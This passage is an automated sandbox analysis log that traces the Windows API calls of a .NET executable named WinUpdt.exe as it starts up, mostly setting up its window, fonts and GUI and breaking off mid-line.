# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 17.03.2020 08:27:33.679 Process: id = "1" image_name = "winupdt.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\winupdt.exe" page_root = "0x47772000" os_pid = "0x8e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x8f8 [0029.661] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0032.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x39e788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0032.945] IsAppThemed () returned 0x1 [0032.948] CoTaskMemAlloc (cb=0xf0) returned 0x79ab50 [0032.948] CreateActCtxA (pActCtx=0x39ec84) returned 0x79ad44 [0033.013] CoTaskMemFree (pv=0x79ab50) [0033.024] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc167 [0033.024] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc169 [0033.035] GetUserNameW (in: lpBuffer=0x39eac4, pcbBuffer=0x39ed3c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x39ed3c) returned 1 [0033.038] GetComputerNameW (in: lpBuffer=0x39eac4, nSize=0x39ed3c | out: lpBuffer="XDUWTFONO", nSize=0x39ed3c) returned 1 [0033.039] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x39ebbc, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0033.083] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0033.086] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74970000 [0033.578] AdjustWindowRectEx (in: lpRect=0x39ecdc, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50081 | out: lpRect=0x39ecdc) returned 1 [0033.580] GetCurrentProcess () returned 0xffffffff [0033.581] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x39ebf4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x39ebf4*=0x210) returned 1 [0033.594] GetCurrentActCtx (in: lphActCtx=0x39eb54 | out: lphActCtx=0x39eb54*=0x0) returned 1 [0033.594] ActivateActCtx (in: hActCtx=0x79ad44, lpCookie=0x39eb64 | out: hActCtx=0x79ad44, lpCookie=0x39eb64) returned 1 [0033.594] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0033.598] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x747d0000 [0034.248] GetModuleHandleW (lpModuleName="user32.dll") returned 0x77130000 [0034.248] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0034.249] GetStockObject (i=5) returned 0x1900015 [0034.265] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0034.267] CoTaskMemAlloc (cb=0x5c) returned 0x79ec68 [0034.267] RegisterClassW (lpWndClass=0x39ea0c) returned 0xc121 [0034.268] CoTaskMemFree (pv=0x79ec68) [0034.268] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0034.268] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xe90000, lpParam=0x0) returned 0x6011a [0034.269] SetWindowLongW (hWnd=0x6011a, nIndex=-4, dwNewLong=2009540061) returned 78972966 [0034.269] GetWindowLongW (hWnd=0x6011a, nIndex=-4) returned 2009540061 [0034.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x39e31c | out: phkResult=0x39e31c*=0x228) returned 0x0 [0034.781] RegQueryValueExW (in: hKey=0x228, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x39e33c, lpData=0x0, lpcbData=0x39e338*=0x0 | out: lpType=0x39e33c*=0x0, lpData=0x0, lpcbData=0x39e338*=0x0) returned 0x2 [0034.781] RegQueryValueExW (in: hKey=0x228, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x39e33c, lpData=0x0, lpcbData=0x39e338*=0x0 | out: lpType=0x39e33c*=0x0, lpData=0x0, lpcbData=0x39e338*=0x0) returned 0x2 [0034.781] RegCloseKey (hKey=0x228) returned 0x0 [0034.783] SetWindowLongW (hWnd=0x6011a, nIndex=-4, dwNewLong=78973006) returned 2009540061 [0034.783] GetWindowLongW (hWnd=0x6011a, nIndex=-4) returned 78973006 [0034.783] GetWindowLongW (hWnd=0x6011a, nIndex=-16) returned 113311744 [0034.784] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc122 [0034.784] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc161 [0034.785] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x6011a, Msg=0x81, wParam=0x0, lParam=0x39e5e8) returned 0x1 [0034.785] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x6011a, Msg=0x83, wParam=0x0, lParam=0x39e5d4) returned 0x0 [0034.785] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x6011a, Msg=0x1, wParam=0x0, lParam=0x39e5e8) returned 0x0 [0034.785] GetClientRect (in: hWnd=0x6011a, lpRect=0x39e350 | out: lpRect=0x39e350) returned 1 [0034.785] GetWindowRect (in: hWnd=0x6011a, lpRect=0x39e350 | out: lpRect=0x39e350) returned 1 [0034.786] GetParent (hWnd=0x6011a) returned 0x0 [0034.786] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c090001) returned 1 [0034.848] EtwEventRegister () returned 0x0 [0034.853] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74970000 [0034.854] AdjustWindowRectEx (in: lpRect=0x39ec94, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x39ec94) returned 1 [0034.854] GetSystemMetrics (nIndex=59) returned 1460 [0034.854] GetSystemMetrics (nIndex=60) returned 920 [0034.854] GetSystemMetrics (nIndex=34) returned 132 [0034.854] GetSystemMetrics (nIndex=35) returned 38 [0034.854] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74970000 [0034.854] AdjustWindowRectEx (in: lpRect=0x39eb94, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x39eb94) returned 1 [0034.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe.config", nBufferLength=0x105, lpBuffer=0x39e598, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe.config", lpFilePart=0x0) returned 0x38 [0034.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x39ea2c) returned 1 [0034.859] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\winupdt.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x39eaa8 | out: lpFileInformation=0x39eaa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0034.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x39ea28) returned 1 [0035.122] GetSystemMetrics (nIndex=11) returned 32 [0035.123] GetSystemMetrics (nIndex=12) returned 32 [0035.123] GetDC (hWnd=0x0) returned 0x3401079c [0035.126] GetDeviceCaps (hdc=0x3401079c, index=12) returned 32 [0035.126] GetDeviceCaps (hdc=0x3401079c, index=14) returned 1 [0035.126] ReleaseDC (hWnd=0x0, hDC=0x3401079c) returned 1 [0035.126] CreateIconFromResourceEx (presbits=0x22d9f90, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x90185 [0035.134] CreateCompatibleDC (hdc=0x0) returned 0xd0109cc [0035.135] GetSystemDefaultLCID () returned 0x409 [0035.135] GetStockObject (i=17) returned 0x18a0025 [0035.137] GetObjectW (in: h=0x18a0025, c=92, pv=0x39e9ec | out: pv=0x39e9ec) returned 92 [0035.137] GetDC (hWnd=0x0) returned 0x3401079c [0035.173] GdiplusStartup (in: token=0x126fc0, input=0x39dfb8, output=0x39e008 | out: token=0x126fc0, output=0x39e008) returned 0x0 [0035.192] CoTaskMemAlloc (cb=0x5c) returned 0x79e928 [0035.195] GdipCreateFontFromLogfontW (hdc=0x3401079c, logfont=0x79e928, font=0x39eab4) returned 0x0 [0035.310] CoTaskMemFree (pv=0x79e928) [0035.310] CoTaskMemAlloc (cb=0x5c) returned 0x79e928 [0035.310] CoTaskMemFree (pv=0x79e928) [0035.311] CoTaskMemAlloc (cb=0x5c) returned 0x79e928 [0035.311] CoTaskMemFree (pv=0x79e928) [0035.311] GdipGetFontUnit (font=0x272230, unit=0x39ea80) returned 0x0 [0035.311] GdipGetFontSize (font=0x272230, size=0x39ea84) returned 0x0 [0035.311] GdipGetFontStyle (font=0x272230, style=0x39ea7c) returned 0x0 [0035.311] GdipGetFamily (font=0x272230, family=0x39ea78) returned 0x0 [0035.312] GdipGetFontSize (font=0x272230, size=0x22db534) returned 0x0 [0035.312] ReleaseDC (hWnd=0x0, hDC=0x3401079c) returned 1 [0035.312] GetDC (hWnd=0x0) returned 0x1701025f [0035.314] GdipCreateFromHDC (hdc=0x1701025f, graphics=0x39eaa0) returned 0x0 [0035.314] GdipGetDpiY (graphics=0x6f8fcf0, dpi=0x22db63c) returned 0x0 [0035.315] GdipGetFontHeight (font=0x272230, graphics=0x6f8fcf0, height=0x39ea98) returned 0x0 [0035.315] GdipGetEmHeight (family=0x27f6b8, style=0, EmHeight=0x39eaa0) returned 0x0 [0035.315] GdipGetLineSpacing (family=0x27f6b8, style=0, LineSpacing=0x39eaa0) returned 0x0 [0035.315] GdipDeleteGraphics (graphics=0x6f8fcf0) returned 0x0 [0035.315] ReleaseDC (hWnd=0x0, hDC=0x1701025f) returned 1 [0035.316] GdipCreateFont (fontFamily=0x27f6b8, emSize=0x41040000, style=0, unit=0x3, font=0x22db5fc) returned 0x0 [0035.316] GdipGetFontSize (font=0x6fe2940, size=0x22db600) returned 0x0 [0035.316] GdipDeleteFont (font=0x272230) returned 0x0 [0035.317] GetDC (hWnd=0x0) returned 0x1701025f [0035.317] GdipCreateFromHDC (hdc=0x1701025f, graphics=0x39eac4) returned 0x0 [0035.317] CoTaskMemAlloc (cb=0x5c) returned 0x79e928 [0035.317] GdipGetLogFontW (font=0x6fe2940, graphics=0x6f8fcf0, logfontW=0x79e928) returned 0x0 [0035.318] CoTaskMemFree (pv=0x79e928) [0035.318] CoTaskMemAlloc (cb=0x5c) returned 0x79e928 [0035.318] CoTaskMemFree (pv=0x79e928) [0035.318] CoTaskMemAlloc (cb=0x5c) returned 0x79e928 [0035.318] CoTaskMemFree (pv=0x79e928) [0035.318] GdipDeleteGraphics (graphics=0x6f8fcf0) returned 0x0 [0035.318] ReleaseDC (hWnd=0x0, hDC=0x1701025f) returned 1 [0035.319] CoTaskMemAlloc (cb=0x5c) returned 0x79e928 [0035.319] CreateFontIndirectW (lplf=0x79e928) returned 0x90a09c1 [0035.319] CoTaskMemFree (pv=0x79e928) [0035.319] SelectObject (hdc=0xd0109cc, h=0x90a09c1) returned 0x18a002e [0035.319] GetTextMetricsW (in: hdc=0xd0109cc, lptm=0x39ebd0 | out: lptm=0x39ebd0) returned 1 [0035.320] GetTextExtentPoint32W (in: hdc=0xd0109cc, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x22db858 | out: psizl=0x22db858) returned 1 [0035.321] SelectObject (hdc=0xd0109cc, h=0x18a002e) returned 0x90a09c1 [0035.325] DeleteDC (hdc=0xd0109cc) returned 1 [0035.325] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74970000 [0035.325] AdjustWindowRectEx (in: lpRect=0x39e938, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x39e938) returned 1 [0035.325] AdjustWindowRectEx (in: lpRect=0x39eb5c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x39eb5c) returned 1 [0035.325] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74970000 [0035.325] AdjustWindowRectEx (in: lpRect=0x39e8b0, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x39e8b0) returned 1 [0035.325] AdjustWindowRectEx (in: lpRect=0x39e994, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x39e994) returned 1 [0035.328] GetSystemMetrics (nIndex=59) returned 1460 [0035.328] GetSystemMetrics (nIndex=60) returned 920 [0035.328] GetSystemMetrics (nIndex=34) returned 132 [0035.328] GetSystemMetrics (nIndex=35) returned 38 [0035.328] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74970000 [0035.328] AdjustWindowRectEx (in: lpRect=0x39e840, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x39e840) returned 1 [0035.328] AdjustWindowRectEx (in: lpRect=0x39e908, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x39e908) returned 1 [0035.328] GetCurrentActCtx (in: lphActCtx=0x39ecf8 | out: lphActCtx=0x39ecf8*=0x0) returned 1 [0035.328] ActivateActCtx (in: hActCtx=0x79ad44, lpCookie=0x39ed08 | out: hActCtx=0x79ad44, lpCookie=0x39ed08) returned 1 [0035.331] GetCurrentActCtx (in: lphActCtx=0x39eb18 | out: lphActCtx=0x39eb18*=0x79ad44) returned 1 [0035.331] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x747d0000 [0035.331] AdjustWindowRectEx (in: lpRect=0x39ea78, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x39ea78) returned 1 [0035.331] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0035.331] CreateWindowExW (dwExStyle=0x50080, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName="no reason", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=164, nHeight=91, hWndParent=0x0, hMenu=0x0, hInstance=0xe90000, lpParam=0x0) returned 0x50116 [0035.331] SetWindowLongW (hWnd=0x50116, nIndex=-4, dwNewLong=2009540061) returned 78972966 [0035.331] GetWindowLongW (hWnd=0x50116, nIndex=-4) returned 2009540061 [0035.332] SetWindowLongW (hWnd=0x50116, nIndex=-4, dwNewLong=78973086) returned 2009540061 [0035.332] GetWindowLongW (hWnd=0x50116, nIndex=-4) returned 78973086 [0035.332] GetWindowLongW (hWnd=0x50116, nIndex=-16) returned 114229248 [0035.332] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x81, wParam=0x0, lParam=0x39e5ac) returned 0x1 [0035.333] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x83, wParam=0x0, lParam=0x39e598) returned 0x0 [0035.447] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x1, wParam=0x0, lParam=0x39e5ac) returned 0x0 [0035.447] GetClientRect (in: hWnd=0x50116, lpRect=0x39e2e4 | out: lpRect=0x39e2e4) returned 1 [0035.447] GetWindowRect (in: hWnd=0x50116, lpRect=0x39e2e4 | out: lpRect=0x39e2e4) returned 1 [0035.448] SetWindowTextW (hWnd=0x50116, lpString="no reason") returned 1 [0035.448] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xc, wParam=0x0, lParam=0x22c64d8) returned 0x1 [0035.462] GetUserObjectInformationA (in: hObj=0x5c, nIndex=1, pvInfo=0x22dbdf4, nLength=0xc, lpnLengthNeeded=0x39e1e4 | out: pvInfo=0x22dbdf4, lpnLengthNeeded=0x39e1e4) returned 1 [0035.465] SetConsoleCtrlHandler (HandlerRoutine=0x4b508c6, Add=1) returned 1 [0035.465] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0035.466] GetModuleHandleW (lpModuleName=0x0) returned 0xe90000 [0035.467] GetClassInfoW (in: hInstance=0xe90000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x22dbe58 | out: lpWndClass=0x22dbe58) returned 0 [0035.468] CoTaskMemAlloc (cb=0x58) returned 0x77df58 [0035.468] RegisterClassW (lpWndClass=0x39e134) returned 0xc163 [0035.468] CoTaskMemFree (pv=0x77df58) [0035.469] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xe90000, lpParam=0x0) returned 0x60106 [0035.469] NtdllDefWindowProc_W () returned 0x0 [0035.469] NtdllDefWindowProc_W () returned 0x0 [0035.469] NtdllDefWindowProc_W () returned 0x0 [0035.469] NtdllDefWindowProc_W () returned 0x0 [0035.476] GetStartupInfoW (in: lpStartupInfo=0x22dc1d8 | out: lpStartupInfo=0x22dc1d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.476] GetParent (hWnd=0x50116) returned 0x0 [0035.476] SetWindowLongW (hWnd=0x50116, nIndex=-8, dwNewLong=0) returned 0 [0035.476] GetSystemMetrics (nIndex=49) returned 16 [0035.476] GetSystemMetrics (nIndex=50) returned 16 [0035.476] CreateIconFromResourceEx (presbits=0x22dc258, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x90167 [0035.477] SendMessageW (hWnd=0x50116, Msg=0x80, wParam=0x0, lParam=0x90167) returned 0x0 [0035.477] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x80, wParam=0x0, lParam=0x90167) returned 0x0 [0035.477] SendMessageW (hWnd=0x50116, Msg=0x80, wParam=0x1, lParam=0x90185) returned 0x0 [0035.477] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x80, wParam=0x1, lParam=0x90185) returned 0x0 [0035.493] GetSystemMenu (hWnd=0x50116, bRevert=0) returned 0x50247 [0035.495] GetWindowPlacement (in: hWnd=0x50116, lpwndpl=0x39eb28 | out: lpwndpl=0x39eb28) returned 1 [0035.495] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0035.495] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0035.495] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0035.495] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0035.495] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0035.495] GetClientRect (in: hWnd=0x50116, lpRect=0x39eb6c | out: lpRect=0x39eb6c) returned 1 [0035.495] GetClientRect (in: hWnd=0x50116, lpRect=0x39eacc | out: lpRect=0x39eacc) returned 1 [0035.495] GetWindowRect (in: hWnd=0x50116, lpRect=0x39eacc | out: lpRect=0x39eacc) returned 1 [0035.496] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x747d0000 [0035.496] GetWindowLongW (hWnd=0x50116, nIndex=-16) returned 114229248 [0035.496] GetWindowTextLengthW (hWnd=0x50116) returned 9 [0035.496] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.496] GetSystemMetrics (nIndex=42) returned 0 [0035.496] GetWindowTextW (in: hWnd=0x50116, lpString=0x39ea64, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.496] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xd, wParam=0xa, lParam=0x39ea64) returned 0x9 [0035.497] GetWindowTextLengthW (hWnd=0x50116) returned 9 [0035.497] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.497] GetSystemMetrics (nIndex=42) returned 0 [0035.497] GetWindowTextW (in: hWnd=0x50116, lpString=0x39ea64, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.497] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xd, wParam=0xa, lParam=0x39ea64) returned 0x9 [0035.497] GetWindowLongW (hWnd=0x50116, nIndex=-16) returned 114229248 [0035.497] GetWindowLongW (hWnd=0x50116, nIndex=-20) returned 328064 [0035.497] SetWindowLongW (hWnd=0x50116, nIndex=-16, dwNewLong=47120384) returned 114229248 [0035.497] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x7c, wParam=0xfffffff0, lParam=0x39eac0) returned 0x0 [0035.497] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x7d, wParam=0xfffffff0, lParam=0x39eac0) returned 0x0 [0035.497] SetWindowLongW (hWnd=0x50116, nIndex=-20, dwNewLong=327808) returned 328064 [0035.497] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x7c, wParam=0xffffffec, lParam=0x39eac0) returned 0x0 [0035.498] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x7d, wParam=0xffffffec, lParam=0x39eac0) returned 0x0 [0035.498] SetWindowPos (hWnd=0x50116, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0035.498] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x46, wParam=0x0, lParam=0x39eae0) returned 0x0 [0035.498] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x83, wParam=0x1, lParam=0x39eab8) returned 0x0 [0035.499] GetWindowPlacement (in: hWnd=0x50116, lpwndpl=0x39e890 | out: lpwndpl=0x39e890) returned 1 [0035.499] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x47, wParam=0x0, lParam=0x39eae0) returned 0x0 [0035.499] GetClientRect (in: hWnd=0x50116, lpRect=0x39e840 | out: lpRect=0x39e840) returned 1 [0035.499] GetWindowRect (in: hWnd=0x50116, lpRect=0x39e840 | out: lpRect=0x39e840) returned 1 [0035.499] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x83, wParam=0x1, lParam=0x39e6c4) returned 0x0 [0035.500] RedrawWindow (hWnd=0x50116, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0035.500] GetSystemMenu (hWnd=0x50116, bRevert=0) returned 0x50247 [0035.500] GetWindowPlacement (in: hWnd=0x50116, lpwndpl=0x39eb18 | out: lpwndpl=0x39eb18) returned 1 [0035.500] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0035.500] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0035.500] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0035.500] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0035.500] EnableMenuItem (hMenu=0x50247, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0035.500] ShowWindow (hWnd=0x50116, nCmdShow=5) [0035.500] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0035.501] GetWindowTextLengthW (hWnd=0x50116) returned 9 [0035.501] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.501] GetSystemMetrics (nIndex=42) returned 0 [0035.501] GetWindowTextW (in: hWnd=0x50116, lpString=0x39e788, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.501] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xd, wParam=0xa, lParam=0x39e788) returned 0x9 [0035.509] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x747d0000 [0035.509] GetWindowLongW (hWnd=0x50116, nIndex=-16) returned 114229248 [0035.509] GetWindowTextLengthW (hWnd=0x50116) returned 9 [0035.509] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.509] GetSystemMetrics (nIndex=42) returned 0 [0035.509] GetWindowTextW (in: hWnd=0x50116, lpString=0x39e688, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.509] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xd, wParam=0xa, lParam=0x39e688) returned 0x9 [0035.509] GetWindowTextLengthW (hWnd=0x50116) returned 9 [0035.509] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0035.510] GetSystemMetrics (nIndex=42) returned 0 [0035.510] GetWindowTextW (in: hWnd=0x50116, lpString=0x39e688, nMaxCount=10 | out: lpString="no reason") returned 9 [0035.510] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0xd, wParam=0xa, lParam=0x39e688) returned 0x9 [0035.510] GetWindowLongW (hWnd=0x50116, nIndex=-16) returned 114229248 [0035.510] GetWindowLongW (hWnd=0x50116, nIndex=-20) returned 328064 [0035.510] SetWindowLongW (hWnd=0x50116, nIndex=-16, dwNewLong=315555840) returned 114229248 [0035.510] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x7c, wParam=0xfffffff0, lParam=0x39e6e4) returned 0x0 [0035.510] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x7d, wParam=0xfffffff0, lParam=0x39e6e4) returned 0x0 [0035.510] SetWindowLongW (hWnd=0x50116, nIndex=-20, dwNewLong=852096) returned 328064 [0035.510] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x7c, wParam=0xffffffec, lParam=0x39e6e4) returned 0x0 [0035.518] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x7d, wParam=0xffffffec, lParam=0x39e6e4) returned 0x0 [0035.518] SetWindowPos (hWnd=0x50116, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0035.518] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x46, wParam=0x0, lParam=0x39e704) returned 0x0 [0035.518] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x83, wParam=0x1, lParam=0x39e6dc) returned 0x0 [0035.519] GetWindowPlacement (in: hWnd=0x50116, lpwndpl=0x39e4b4 | out: lpwndpl=0x39e4b4) returned 1 [0035.519] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x50116, Msg=0x47, wParam=0x0, lParam=0x39e704) returned 0x0 [0035.519] GetClientRect (in: hWnd=0x50116, lpRect=0x39e464 | out: lpRect=0x39e464) returned 1 [0035.519] GetWindowRect (in: hWnd=0x50116, 